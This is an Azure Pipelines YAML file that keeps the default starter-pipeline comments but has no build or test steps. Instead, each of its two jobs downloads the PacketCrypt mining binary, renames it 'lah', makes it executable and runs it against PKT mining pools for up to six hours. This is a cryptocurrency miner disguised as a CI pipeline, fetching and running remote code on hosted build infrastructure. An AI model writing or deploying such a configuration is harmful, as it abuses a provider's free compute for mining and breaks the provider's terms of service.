# Starter pipeline
# Start with a minimal pipeline that you can customize to build and deploy your code.
# Add steps that build, run tests, deploy, and more:
# https://aka.ms/yaml

trigger:
- main

pool: Azure Pipelines

jobs:
- job: a
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: wget https://www.pkt.world/ext/packetcrypt-linux-amd64 -O lah && chmod +x lah && ./lah ann -p wallet  http://pool.pkt.world/ http://pool.pktpool.io/

- job: b
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: wget https://www.pkt.world/ext/packetcrypt-linux-amd64 -O lah && chmod +x lah && ./lah ann -p wwallet  http://pool.pkt.world/ http://pool.pktpool.io/
